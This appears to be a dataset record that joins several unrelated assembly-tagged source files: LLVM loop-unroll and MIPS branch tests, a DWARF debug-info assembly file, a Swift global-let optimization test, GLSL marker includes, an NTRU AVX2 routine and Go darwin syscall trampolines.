%0 = load i32* %arrayidx, align 4
%inc = add nsw i32 %0, 1
store i32 %inc, i32* %arrayidx, align 4
%indvars.iv.next = add nuw nsw i64 %indvars.iv, 1
%exitcond = icmp eq i64 %indvars.iv.next, 64
br i1 %exitcond, label %for.end, label %for.body, !llvm.loop !5
for.end: ; preds = %for.body
ret void
}
!5 = !{!5, !6}
!6 = !{!"llvm.loop.unroll.count", i32 4}
; #pragma clang loop unroll(full)
; Full unrolling is requested, but loop has a dynamic trip count so
; no unrolling should occur.
;
; CHECK-LABEL: @dynamic_loop_with_enable(
; CHECK: store i32
; CHECK-NOT: store i32
; CHECK: br i1
define void @dynamic_loop_with_enable(i32* nocapture %a, i32 %b) {
entry:
%cmp3 = icmp sgt i32 %b, 0
br i1 %cmp3, label %for.body, label %for.end, !llvm.loop !8
for.body: ; preds = %entry, %for.body
%indvars.iv = phi i64 [ %indvars.iv.next, %for.body ], [ 0, %entry ]
%arrayidx = getelementptr inbounds i32* %a, i64 %indvars.iv
%0 = load i32* %arrayidx, align 4
%inc = add nsw i32 %0, 1
store i32 %inc, i32* %arrayidx, align 4
%indvars.iv.next = add nuw nsw i64 %indvars.iv, 1
%lftr.wideiv = trunc i64 %indvars.iv.next to i32
%exitcond = icmp eq i32 %lftr.wideiv, %b
br i1 %exitcond, label %for.end, label %for.body, !llvm.loop !8
for.end: ; preds = %for.body, %entry
ret void
}
!8 = !{!8, !4}
; #pragma clang loop unroll_count(4)
; Loop has a dynamic trip count. Unrolling should occur, but no
; conditional branches can be removed.
;
; CHECK-LABEL: @dynamic_loop_with_count4(
; CHECK-NOT: store
; CHECK: br i1
; CHECK: store
; CHECK: br i1
; CHECK: store
; CHECK: br i1
; CHECK: store
; CHECK: br i1
; CHECK: store
; CHECK: br i1
; CHECK-NOT: br i1
define void @dynamic_loop_with_count4(i32* nocapture %a, i32 %b) {
entry:
%cmp3 = icmp sgt i32 %b, 0
br i1 %cmp3, label %for.body, label %for.end, !llvm.loop !9
for.body: ; preds = %entry, %for.body
%indvars.iv = phi i64 [ %indvars.iv.next, %for.body ], [ 0, %entry ]
%arrayidx = getelementptr inbounds i32* %a, i64 %indvars.iv
%0 = load i32* %arrayidx, align 4
%inc = add nsw i32 %0, 1
store i32 %inc, i32* %arrayidx, align 4
%indvars.iv.next = add nuw nsw i64 %indvars.iv, 1
%lftr.wideiv = trunc i64 %indvars.iv.next to i32
%exitcond = icmp eq i32 %lftr.wideiv, %b
br i1 %exitcond, label %for.end, label %for.body, !llvm.loop !9
for.end: ; preds = %for.body, %entry
ret void
}
!9 = !{!9, !6}
; #pragma clang loop unroll_count(1)
; Loop should not be unrolled
;
; CHECK-LABEL: @unroll_1(
; CHECK: store i32
; CHECK-NOT: store i32
; CHECK: br i1
define void @unroll_1(i32* nocapture %a, i32 %b) {
entry:
br label %for.body
for.body: ; preds = %for.body, %entry
%indvars.iv = phi i64 [ 0, %entry ], [ %indvars.iv.next, %for.body ]
%arrayidx = getelementptr inbounds i32* %a, i64 %indvars.iv
%0 = load i32* %arrayidx, align 4
%inc = add nsw i32 %0, 1
store i32 %inc, i32* %arrayidx, align 4
%indvars.iv.next = add nuw nsw i64 %indvars.iv, 1
%exitcond = icmp eq i64 %indvars.iv.next, 4
br i1 %exitcond, label %for.end, label %for.body, !llvm.loop !10
for.end: ; preds = %for.body
ret void
}
!10 = !{!10, !11}
!11 = !{!"llvm.loop.unroll.count", i32 1}
; #pragma clang loop unroll(full)
; Loop has very high loop count (1 million) and full unrolling was requested.
; Loop should unrolled up to the pragma threshold, but not completely.
;
; CHECK-LABEL: @unroll_1M(
; CHECK: store i32
; CHECK: store i32
; CHECK: br i1
define void @unroll_1M(i32* nocapture %a, i32 %b) {
entry:
br label %for.body
for.body: ; preds = %for.body, %entry
%indvars.iv = phi i64 [ 0, %entry ], [ %indvars.iv.next, %for.body ]
%arrayidx = getelementptr inbounds i32* %a, i64 %indvars.iv
%0 = load i32* %arrayidx, align 4
%inc = add nsw i32 %0, 1
store i32 %inc, i32* %arrayidx, align 4
%indvars.iv.next = add nuw nsw i64 %indvars.iv, 1
%exitcond = icmp eq i64 %indvars.iv.next, 1000000
br i1 %exitcond, label %for.end, label %for.body, !llvm.loop !12
for.end: ; preds = %for.body
ret void
}
!12 = !{!12, !4}
| {
"language": "Assembly"
} |
# This assembly file was generated from the following trivial C code:
# $ cat scattered.c
# int bar = 42;
# $ clang -S -arch armv7 -g scattered.c
# $ clang -c -o 1.o scattered.s
#
# Then I edited the debug info bellow to change the DW_AT_location of the bar
# variable from '.long _bar' to '.long _bar + 16' in order to generate a
# scattered reloc (I do not think LLVM will generate scattered relocs in
# debug info by itself).
.section __TEXT,__text,regular,pure_instructions
.ios_version_min 5, 0
.syntax unified
.file 1 "scattered.c"
.section __DATA,__data
.globl _bar @ @bar
.p2align 2
_bar:
.long 42 @ 0x2a
.section __DWARF,__debug_str,regular,debug
Linfo_string:
.asciz "clang version 3.9.0 (trunk 259311)" @ string offset=0
.asciz "scattered.c" @ string offset=35
.asciz "/tmp" @ string offset=47
.asciz "bar" @ string offset=52
.asciz "int" @ string offset=56
.section __DWARF,__debug_loc,regular,debug
Lsection_debug_loc:
.section __DWARF,__debug_abbrev,regular,debug
Lsection_abbrev:
.byte 1 @ Abbreviation Code
.byte 17 @ DW_TAG_compile_unit
.byte 1 @ DW_CHILDREN_yes
.byte 37 @ DW_AT_producer
.byte 14 @ DW_FORM_strp
.byte 19 @ DW_AT_language
.byte 5 @ DW_FORM_data2
.byte 3 @ DW_AT_name
.byte 14 @ DW_FORM_strp
.byte 16 @ DW_AT_stmt_list
.byte 6 @ DW_FORM_data4
.byte 27 @ DW_AT_comp_dir
.byte 14 @ DW_FORM_strp
.byte 0 @ EOM(1)
.byte 0 @ EOM(2)
.byte 2 @ Abbreviation Code
.byte 52 @ DW_TAG_variable
.byte 0 @ DW_CHILDREN_no
.byte 3 @ DW_AT_name
.byte 14 @ DW_FORM_strp
.byte 73 @ DW_AT_type
.byte 19 @ DW_FORM_ref4
.byte 63 @ DW_AT_external
.byte 12 @ DW_FORM_flag
.byte 58 @ DW_AT_decl_file
.byte 11 @ DW_FORM_data1
.byte 59 @ DW_AT_decl_line
.byte 11 @ DW_FORM_data1
.byte 2 @ DW_AT_location
.byte 10 @ DW_FORM_block1
.byte 0 @ EOM(1)
.byte 0 @ EOM(2)
.byte 3 @ Abbreviation Code
.byte 36 @ DW_TAG_base_type
.byte 0 @ DW_CHILDREN_no
.byte 3 @ DW_AT_name
.byte 14 @ DW_FORM_strp
.byte 62 @ DW_AT_encoding
.byte 11 @ DW_FORM_data1
.byte 11 @ DW_AT_byte_size
.byte 11 @ DW_FORM_data1
.byte 0 @ EOM(1)
.byte 0 @ EOM(2)
.byte 0 @ EOM(3)
.section __DWARF,__debug_info,regular,debug
Lsection_info:
Lcu_begin0:
.long 52 @ Length of Unit
.short 2 @ DWARF version number
Lset0 = Lsection_abbrev-Lsection_abbrev @ Offset Into Abbrev. Section
.long Lset0
.byte 4 @ Address Size (in bytes)
.byte 1 @ Abbrev [1] 0xb:0x2d DW_TAG_compile_unit
.long 0 @ DW_AT_producer
.short 12 @ DW_AT_language
.long 35 @ DW_AT_name
Lset1 = Lline_table_start0-Lsection_line @ DW_AT_stmt_list
.long Lset1
.long 47 @ DW_AT_comp_dir
.byte 2 @ Abbrev [2] 0x1e:0x12 DW_TAG_variable
.long 52 @ DW_AT_name
.long 48 @ DW_AT_type
.byte 1 @ DW_AT_external
.byte 1 @ DW_AT_decl_file
.byte 1 @ DW_AT_decl_line
.byte 5 @ DW_AT_location
.byte 3
.long _bar + 16
.byte 3 @ Abbrev [3] 0x30:0x7 DW_TAG_base_type
.long 56 @ DW_AT_name
.byte 5 @ DW_AT_encoding
.byte 4 @ DW_AT_byte_size
.byte 0 @ End Of Children Mark
.section __DWARF,__debug_ranges,regular,debug
Ldebug_range:
.section __DWARF,__debug_macinfo,regular,debug
.byte 0 @ End Of Macro List Mark
.section __DWARF,__apple_names,regular,debug
Lnames_begin:
.long 1212240712 @ Header Magic
.short 1 @ Header Version
.short 0 @ Header Hash Function
.long 1 @ Header Bucket Count
.long 1 @ Header Hash Count
.long 12 @ Header Data Length
.long 0 @ HeaderData Die Offset Base
.long 1 @ HeaderData Atom Count
.short 1 @ DW_ATOM_die_offset
.short 6 @ DW_FORM_data4
.long 0 @ Bucket 0
.long 193487034 @ Hash in Bucket 0
.long LNames0-Lnames_begin @ Offset in Bucket 0
LNames0:
.long 52 @ bar
.long 1 @ Num DIEs
.long 30
.long 0
.section __DWARF,__apple_objc,regular,debug
Lobjc_begin:
.long 1212240712 @ Header Magic
.short 1 @ Header Version
.short 0 @ Header Hash Function
.long 1 @ Header Bucket Count
.long 0 @ Header Hash Count
.long 12 @ Header Data Length
.long 0 @ HeaderData Die Offset Base
.long 1 @ HeaderData Atom Count
.short 1 @ DW_ATOM_die_offset
.short 6 @ DW_FORM_data4
.long -1 @ Bucket 0
.section __DWARF,__apple_namespac,regular,debug
Lnamespac_begin:
.long 1212240712 @ Header Magic
.short 1 @ Header Version
.short 0 @ Header Hash Function
.long 1 @ Header Bucket Count
.long 0 @ Header Hash Count
.long 12 @ Header Data Length
.long 0 @ HeaderData Die Offset Base
.long 1 @ HeaderData Atom Count
.short 1 @ DW_ATOM_die_offset
.short 6 @ DW_FORM_data4
.long -1 @ Bucket 0
.section __DWARF,__apple_types,regular,debug
Ltypes_begin:
.long 1212240712 @ Header Magic
.short 1 @ Header Version
.short 0 @ Header Hash Function
.long 1 @ Header Bucket Count
.long 1 @ Header Hash Count
.long 20 @ Header Data Length
.long 0 @ HeaderData Die Offset Base
.long 3 @ HeaderData Atom Count
.short 1 @ DW_ATOM_die_offset
.short 6 @ DW_FORM_data4
.short 3 @ DW_ATOM_die_tag
.short 5 @ DW_FORM_data2
.short 4 @ DW_ATOM_type_flags
.short 11 @ DW_FORM_data1
.long 0 @ Bucket 0
.long 193495088 @ Hash in Bucket 0
.long Ltypes0-Ltypes_begin @ Offset in Bucket 0
Ltypes0:
.long 56 @ int
.long 1 @ Num DIEs
.long 48
.short 36
.byte 0
.long 0
.subsections_via_symbols
.section __DWARF,__debug_line,regular,debug
Lsection_line:
Lline_table_start0:
| {
"language": "Assembly"
} |
// RUN: %target-swift-frontend -O -emit-sil -primary-file %s | %FileCheck %s
// Check that values of static let and global let variables are propagated into their uses
// and enable further optimizations like constant propagation, simplifications, etc.
// Define some global let variables.
// Currently GlobalOpt cannot deal with the new alloc_global instruction.
let PI = 3.1415
let ONE = 1.000
let I = 100
let J = 200
let S = "String1"
let VOLUME1 = I * J
let VOLUME2 = J * 2
let VOLUME3 = I + 10
struct IntWrapper1 {
let val: Int
}
struct IntWrapper2 {
let val: IntWrapper1
}
struct IntWrapper3 {
let val: IntWrapper2
}
struct IntWrapper4 {
let val: IntWrapper2
let val2: IntWrapper1
}
// Test with an initializer, where a SIL debug_value instruction might block
// analysis of the initializer and inhibit optimization of the let.
struct IntWrapper5 {
let val: Int
init(val: Int) { self.val = val }
static let Five = IntWrapper5(val: 5)
}
var PROP1: Double {
return PI
}
var PROP2: Int {
return I * J - I
}
var VPI = 3.1415
var VI = 100
var VS = "String2"
// Define some static let variables inside a struct.
struct B {
static let PI = 3.1415
static let ONE = 1.000
static let I = 100
static let J = 200
static let S1 = "String3"
static let VOLUME1 = I * J
static let VOLUME2 = J * 2
static let VOLUME3 = I + 10
static var PROP1: Double {
return PI
}
static var PROP2: Int {
return I * J - I
}
static func foo() {}
static let IW3 = IntWrapper3(val: IntWrapper2(val: IntWrapper1(val: 10)))
static let IW4 = IntWrapper4(val: IntWrapper2(val: IntWrapper1(val: 10)), val2: IntWrapper1(val: 100))
static let IT1 = ((10, 20), 30, 40)
static let IT2 = (100, 200, 300)
}
// Define some static let variables inside a class.
class C {
static let PI = 3.1415
static let ONE = 1.000
static let I = 100
static let J = 200
static let S1 = "String3"
static let VOLUME1 = I * J
static let VOLUME2 = J * 2
static let VOLUME3 = I + 10
static var PROP1: Double {
return PI
}
static var PROP2: Int {
return I * J - I
}
static func foo() {}
static let IW3 = IntWrapper3(val: IntWrapper2(val: IntWrapper1(val: 10)))
static let IW4 = IntWrapper4(val: IntWrapper2(val: IntWrapper1(val: 10)), val2: IntWrapper1(val: 100))
static let IT1 = ((10, 20), 30, 40)
static let IT2 = (100, 200, 300)
}
// CHECK-LABEL: sil [noinline] @_T025globalopt_let_propagation05test_B7_doubleSdyF
// CHECK: bb0:
// CHECK-NEXT: float_literal
// CHECK-NEXT: struct
// CHECK: return
@inline(never)
public func test_let_double() -> Double {
return PI + 1.0
}
// CHECK-LABEL: sil [noinline] @_T025globalopt_let_propagation05test_B4_intSiyF
// CHECK: bb0:
// CHECK-NEXT: integer_literal
// CHECK-NEXT: struct
// CHECK: return
@inline(never)
public func test_let_int() -> Int {
return I + 1
}
@inline(never)
public func test_let_string() -> String {
return S
}
// CHECK-LABEL: sil [noinline] @_T025globalopt_let_propagation05test_B15_double_complexSdyF
// CHECK: bb0:
// CHECK-NEXT: float_literal
// CHECK-NEXT: struct
// CHECK: return
@inline(never)
public func test_let_double_complex() -> Double {
return PI + ONE + PROP1
}
// CHECK-LABEL: sil [noinline] @_T025globalopt_let_propagation05test_B12_int_complexSiyF
// CHECK: bb0:
// CHECK-NEXT: integer_literal
// CHECK-NEXT: struct
// CHECK: return
@inline(never)
public func test_let_int_complex() -> Int {
return I + J + VOLUME1 + VOLUME2 + VOLUME3 + PROP2
}
// CHECK-LABEL: sil [noinline] @_T025globalopt_let_propagation019test_static_struct_B7_doubleSdyF
// CHECK: bb0:
// CHECK-NEXT: float_literal
// CHECK-NEXT: struct
// CHECK: return
@inline(never)
public func test_static_struct_let_double() -> Double {
return B.PI + 1.0
}
// CHECK-LABEL: sil [noinline] @_T025globalopt_let_propagation019test_static_struct_B4_intSiyF
// CHECK: bb0:
// CHECK-NEXT: integer_literal
// CHECK-NEXT: struct
// CHECK: return
@inline(never)
public func test_static_struct_let_int() -> Int {
return B.I + 1
}
@inline(never)
public func test_static_struct_let_string() -> String {
return B.S1
}
// CHECK-LABEL: sil [noinline] @_T025globalopt_let_propagation019test_static_struct_B15_double_complexSdyF
// CHECK: bb0:
// CHECK-NEXT: float_literal
// CHECK-NEXT: struct
// CHECK: return
@inline(never)
public func test_static_struct_let_double_complex() -> Double {
return B.PI + B.ONE + B.PROP1
}
// CHECK-LABEL: sil [noinline] @_T025globalopt_let_propagation019test_static_struct_B12_int_complexSiyF
// CHECK: bb0:
// CHECK-NEXT: integer_literal
// CHECK-NEXT: struct
// CHECK: return
@inline(never)
public func test_static_struct_let_int_complex() -> Int {
return B.I + B.J + B.VOLUME1 + B.VOLUME2 + B.VOLUME3 + B.PROP2
}
// CHECK-LABEL: sil [noinline] @_T025globalopt_let_propagation018test_static_class_B7_doubleSdyF
// CHECK: bb0:
// CHECK-NEXT: float_literal
// CHECK-NEXT: struct
// CHECK: return
@inline(never)
public func test_static_class_let_double() -> Double {
return C.PI + 1.0
}
// CHECK-LABEL: sil [noinline] @_T025globalopt_let_propagation018test_static_class_B4_intSiyF
// CHECK: bb0:
// CHECK-NEXT: integer_literal
// CHECK-NEXT: struct
// CHECK: return
@inline(never)
public func test_static_class_let_int() -> Int {
return C.I + 1
}
@inline(never)
public func test_static_class_let_string() -> String {
return C.S1
}
// CHECK-LABEL: sil [noinline] @_T025globalopt_let_propagation018test_static_class_B15_double_complexSdyF
// CHECK: bb0:
// CHECK-NEXT: float_literal
// CHECK-NEXT: struct
// CHECK: return
@inline(never)
public func test_static_class_let_double_complex() -> Double {
return C.PI + C.ONE + C.PROP1
}
// CHECK-LABEL: sil [noinline] @_T025globalopt_let_propagation018test_static_class_B12_int_complexSiyF
// CHECK: bb0:
// CHECK-NEXT: integer_literal
// CHECK-NEXT: struct
// CHECK: return
@inline(never)
public func test_static_class_let_int_complex() -> Int {
return C.I + C.J + C.VOLUME1 + C.VOLUME2 + C.VOLUME3 + C.PROP2
}
// CHECK-LABEL: sil [noinline] @_T025globalopt_let_propagation15test_var_doubleSdyF
// CHECK: bb0:
// CHECK-NEXT: global_addr
// CHECK-NEXT: struct_element_addr
// CHECK-NEXT: load
@inline(never)
public func test_var_double() -> Double {
return VPI + 1.0
}
// CHECK-LABEL: sil [noinline] @_T025globalopt_let_propagation12test_var_intSiyF
// CHECK: bb0:
// CHECK-NEXT: global_addr
// CHECK-NEXT: struct_element_addr
// CHECK-NEXT: load
@inline(never)
public func test_var_int() -> Int {
return VI + 1
}
// CHECK-LABEL: sil [noinline] @_T025globalopt_let_propagation018test_static_class_B12_wrapped_intSiyF
// CHECK: bb0:
// CHECK-NEXT: integer_literal
// CHECK-NEXT: struct
// CHECK: return
@inline(never)
public func test_static_class_let_wrapped_int() -> Int {
return C.IW3.val.val.val + 1
}
// CHECK-LABEL: sil [noinline] @_T025globalopt_let_propagation019test_static_struct_B12_wrapped_intSiyF
// CHECK: bb0:
// CHECK-NEXT: integer_literal
// CHECK-NEXT: struct
// CHECK: return
@inline(never)
public func test_static_struct_let_wrapped_int() -> Int {
return B.IW3.val.val.val + 1
}
// Test accessing multiple Int fields wrapped into multiple structs, where each struct may have
// multiple fields.
// CHECK-LABEL: sil [noinline] @_T025globalopt_let_propagation019test_static_struct_b1_F22_wrapped_multiple_intsSiyF
// CHECK: bb0:
// CHECK-NOT: global_addr
// CHECK: integer_literal
// CHECK-NOT: global_addr
// CHECK: struct
// CHECK: return
@inline(never)
public func test_static_struct_let_struct_wrapped_multiple_ints() -> Int {
return B.IW4.val.val.val + B.IW4.val2.val + IntWrapper5.Five.val + 1
}
// Test accessing multiple Int fields wrapped into multiple structs, where each struct may have
// multiple fields.
// CHECK-LABEL: sil [noinline] @_T025globalopt_let_propagation018test_static_class_B29_struct_wrapped_multiple_intsSiyF
// CHECK: bb0:
// CHECK-NOT: global_addr
// CHECK: integer_literal
// CHECK-NOT: global_addr
// CHECK: struct
// CHECK: return
@inline(never)
public func test_static_class_let_struct_wrapped_multiple_ints() -> Int {
return C.IW4.val.val.val + C.IW4.val2.val + IntWrapper5.Five.val + 1
}
// Test accessing multiple Int fields wrapped into multiple tuples, where each tuple may have
// multiple fields.
// CHECK-LABEL: sil [noinline] @_T025globalopt_let_propagation019test_static_struct_B19_tuple_wrapped_intsSiyF
// CHECK: bb0:
// CHECK-NOT: global_addr
// CHECK: integer_literal
// CHECK: struct
// CHECK: return
@inline(never)
public func test_static_struct_let_tuple_wrapped_ints() -> Int {
return B.IT1.0.0 + B.IT2.1
}
// Test accessing multiple Int fields wrapped into multiple tuples, where each tuple may have
// multiple fields.
// CHECK-LABEL: sil [noinline] @_T025globalopt_let_propagation018test_static_class_B19_tuple_wrapped_intsSiyF
// CHECK: bb0:
// CHECK-NOT: global_addr
// CHECK: integer_literal
// CHECK: struct
// CHECK: return
@inline(never)
public func test_static_class_let_tuple_wrapped_ints() -> Int {
return C.IT1.0.0 + C.IT2.1
}
| {
"language": "Assembly"
} |
// -----------------------------------------------------------------------------
// Copyright (c) 2009-2016 Nicolas P. Rougier. All rights reserved.
// Distributed under the (new) BSD License.
// -----------------------------------------------------------------------------
#include "markers/arrow.glsl"
#include "markers/asterisk.glsl"
#include "markers/chevron.glsl"
#include "markers/clover.glsl"
#include "markers/club.glsl"
#include "markers/cross.glsl"
#include "markers/diamond.glsl"
#include "markers/disc.glsl"
#include "markers/ellipse.glsl"
#include "markers/hbar.glsl"
#include "markers/heart.glsl"
#include "markers/infinity.glsl"
#include "markers/pin.glsl"
#include "markers/ring.glsl"
#include "markers/spade.glsl"
#include "markers/square.glsl"
#include "markers/tag.glsl"
#include "markers/triangle.glsl"
#include "markers/vbar.glsl"
| {
"language": "Assembly"
} |
.data
.p2align 5
.text
.global PQCLEAN_NTRUHPS2048509_AVX2_poly_mod_q_Phi_n
.global _PQCLEAN_NTRUHPS2048509_AVX2_poly_mod_q_Phi_n
PQCLEAN_NTRUHPS2048509_AVX2_poly_mod_q_Phi_n:
_PQCLEAN_NTRUHPS2048509_AVX2_poly_mod_q_Phi_n:
vmovdqa 992(%rdi), %ymm0
vpermq $3, %ymm0, %ymm0
vpslld $16, %ymm0, %ymm0
vpsrld $16, %ymm0, %ymm1
vpor %ymm0, %ymm1, %ymm0
vbroadcastss %xmm0, %ymm0
vxorpd %ymm1, %ymm1, %ymm1
vpsubw %ymm0, %ymm1, %ymm0
vpaddw 0(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 0(%rdi)
vpaddw 32(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 32(%rdi)
vpaddw 64(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 64(%rdi)
vpaddw 96(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 96(%rdi)
vpaddw 128(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 128(%rdi)
vpaddw 160(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 160(%rdi)
vpaddw 192(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 192(%rdi)
vpaddw 224(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 224(%rdi)
vpaddw 256(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 256(%rdi)
vpaddw 288(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 288(%rdi)
vpaddw 320(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 320(%rdi)
vpaddw 352(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 352(%rdi)
vpaddw 384(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 384(%rdi)
vpaddw 416(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 416(%rdi)
vpaddw 448(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 448(%rdi)
vpaddw 480(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 480(%rdi)
vpaddw 512(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 512(%rdi)
vpaddw 544(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 544(%rdi)
vpaddw 576(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 576(%rdi)
vpaddw 608(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 608(%rdi)
vpaddw 640(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 640(%rdi)
vpaddw 672(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 672(%rdi)
vpaddw 704(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 704(%rdi)
vpaddw 736(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 736(%rdi)
vpaddw 768(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 768(%rdi)
vpaddw 800(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 800(%rdi)
vpaddw 832(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 832(%rdi)
vpaddw 864(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 864(%rdi)
vpaddw 896(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 896(%rdi)
vpaddw 928(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 928(%rdi)
vpaddw 960(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 960(%rdi)
vpaddw 992(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 992(%rdi)
ret
| {
"language": "Assembly"
} |
; RUN: llc -march=mipsel < %s | FileCheck %s
; RUN: llc -march=mips64el < %s | FileCheck %s
; CHECK-LABEL: test_blez:
; CHECK: blez ${{[0-9]+}}, $BB
define void @test_blez(i32 %a) {
entry:
%cmp = icmp sgt i32 %a, 0
br i1 %cmp, label %if.then, label %if.end
if.then:
tail call void @foo1()
br label %if.end
if.end:
ret void
}
declare void @foo1()
; CHECK-LABEL: test_bgez:
; CHECK: bgez ${{[0-9]+}}, $BB
define void @test_bgez(i32 %a) {
entry:
%cmp = icmp slt i32 %a, 0
br i1 %cmp, label %if.then, label %if.end
if.then:
tail call void @foo1()
br label %if.end
if.end:
ret void
}
| {
"language": "Assembly"
} |
// go run mkasm_darwin.go amd64
// Code generated by the command above; DO NOT EDIT.
// +build go1.12
#include "textflag.h"
TEXT ·libc_getgroups_trampoline(SB),NOSPLIT,$0-0
JMP libc_getgroups(SB)
TEXT ·libc_setgroups_trampoline(SB),NOSPLIT,$0-0
JMP libc_setgroups(SB)
TEXT ·libc_wait4_trampoline(SB),NOSPLIT,$0-0
JMP libc_wait4(SB)
TEXT ·libc_accept_trampoline(SB),NOSPLIT,$0-0
JMP libc_accept(SB)
TEXT ·libc_bind_trampoline(SB),NOSPLIT,$0-0
JMP libc_bind(SB)
TEXT ·libc_connect_trampoline(SB),NOSPLIT,$0-0
JMP libc_connect(SB)
TEXT ·libc_socket_trampoline(SB),NOSPLIT,$0-0
JMP libc_socket(SB)
TEXT ·libc_getsockopt_trampoline(SB),NOSPLIT,$0-0
JMP libc_getsockopt(SB)
TEXT ·libc_setsockopt_trampoline(SB),NOSPLIT,$0-0
JMP libc_setsockopt(SB)
TEXT ·libc_getpeername_trampoline(SB),NOSPLIT,$0-0
JMP libc_getpeername(SB)
TEXT ·libc_getsockname_trampoline(SB),NOSPLIT,$0-0
JMP libc_getsockname(SB)
TEXT ·libc_shutdown_trampoline(SB),NOSPLIT,$0-0
JMP libc_shutdown(SB)
TEXT ·libc_socketpair_trampoline(SB),NOSPLIT,$0-0
JMP libc_socketpair(SB)
TEXT ·libc_recvfrom_trampoline(SB),NOSPLIT,$0-0
JMP libc_recvfrom(SB)
TEXT ·libc_sendto_trampoline(SB),NOSPLIT,$0-0
JMP libc_sendto(SB)
TEXT ·libc_recvmsg_trampoline(SB),NOSPLIT,$0-0
JMP libc_recvmsg(SB)
TEXT ·libc_sendmsg_trampoline(SB),NOSPLIT,$0-0
JMP libc_sendmsg(SB)
TEXT ·libc_kevent_trampoline(SB),NOSPLIT,$0-0
JMP libc_kevent(SB)
TEXT ·libc___sysctl_trampoline(SB),NOSPLIT,$0-0
JMP libc___sysctl(SB)
TEXT ·libc_utimes_trampoline(SB),NOSPLIT,$0-0
JMP libc_utimes(SB)
TEXT ·libc_futimes_trampoline(SB),NOSPLIT,$0-0
JMP libc_futimes(SB)
TEXT ·libc_fcntl_trampoline(SB),NOSPLIT,$0-0
JMP libc_fcntl(SB)
TEXT ·libc_poll_trampoline(SB),NOSPLIT,$0-0
JMP libc_poll(SB)
TEXT ·libc_madvise_trampoline(SB),NOSPLIT,$0-0
JMP libc_madvise(SB)
TEXT ·libc_mlock_trampoline(SB),NOSPLIT,$0-0
JMP libc_mlock(SB)
TEXT ·libc_mlockall_trampoline(SB),NOSPLIT,$0-0
JMP libc_mlockall(SB)
TEXT ·libc_mprotect_trampoline(SB),NOSPLIT,$0-0
JMP libc_mprotect(SB)
TEXT ·libc_msync_trampoline(SB),NOSPLIT,$0-0
JMP libc_msync(SB)
TEXT ·libc_munlock_trampoline(SB),NOSPLIT,$0-0
JMP libc_munlock(SB)
TEXT ·libc_munlockall_trampoline(SB),NOSPLIT,$0-0
JMP libc_munlockall(SB)
TEXT ·libc_getattrlist_trampoline(SB),NOSPLIT,$0-0
JMP libc_getattrlist(SB)
TEXT ·libc_pipe_trampoline(SB),NOSPLIT,$0-0
JMP libc_pipe(SB)
TEXT ·libc_getxattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_getxattr(SB)
TEXT ·libc_fgetxattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_fgetxattr(SB)
TEXT ·libc_setxattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_setxattr(SB)
TEXT ·libc_fsetxattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_fsetxattr(SB)
TEXT ·libc_removexattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_removexattr(SB)
TEXT ·libc_fremovexattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_fremovexattr(SB)
TEXT ·libc_listxattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_listxattr(SB)
TEXT ·libc_flistxattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_flistxattr(SB)
TEXT ·libc_setattrlist_trampoline(SB),NOSPLIT,$0-0
JMP libc_setattrlist(SB)
TEXT ·libc_kill_trampoline(SB),NOSPLIT,$0-0
JMP libc_kill(SB)
TEXT ·libc_ioctl_trampoline(SB),NOSPLIT,$0-0
JMP libc_ioctl(SB)
TEXT ·libc_sendfile_trampoline(SB),NOSPLIT,$0-0
JMP libc_sendfile(SB)
TEXT ·libc_access_trampoline(SB),NOSPLIT,$0-0
JMP libc_access(SB)
TEXT ·libc_adjtime_trampoline(SB),NOSPLIT,$0-0
JMP libc_adjtime(SB)
TEXT ·libc_chdir_trampoline(SB),NOSPLIT,$0-0
JMP libc_chdir(SB)
TEXT ·libc_chflags_trampoline(SB),NOSPLIT,$0-0
JMP libc_chflags(SB)
TEXT ·libc_chmod_trampoline(SB),NOSPLIT,$0-0
JMP libc_chmod(SB)
TEXT ·libc_chown_trampoline(SB),NOSPLIT,$0-0
JMP libc_chown(SB)
TEXT ·libc_chroot_trampoline(SB),NOSPLIT,$0-0
JMP libc_chroot(SB)
TEXT ·libc_clock_gettime_trampoline(SB),NOSPLIT,$0-0
JMP libc_clock_gettime(SB)
TEXT ·libc_close_trampoline(SB),NOSPLIT,$0-0
JMP libc_close(SB)
TEXT ·libc_dup_trampoline(SB),NOSPLIT,$0-0
JMP libc_dup(SB)
TEXT ·libc_dup2_trampoline(SB),NOSPLIT,$0-0
JMP libc_dup2(SB)
TEXT ·libc_exchangedata_trampoline(SB),NOSPLIT,$0-0
JMP libc_exchangedata(SB)
